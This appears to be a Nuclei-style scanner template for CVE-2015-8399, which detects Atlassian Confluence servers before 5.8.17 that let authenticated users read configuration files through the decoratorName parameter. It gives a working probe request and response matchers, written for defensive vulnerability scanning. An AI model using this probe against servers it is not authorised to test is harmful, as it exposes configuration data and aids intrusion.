id: CVE-2015-8399 info: author: princechaddha name: Atlassian Confluence configuration files read severity: medium description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro tags: cve,cve2015,atlassian,confluence classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.30 cve-id: CVE-2015-8399 cwe-id: CWE-200 requests: - method: GET path: - "{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "confluence-init.properties" - "View Default Decorator" condition: and part: body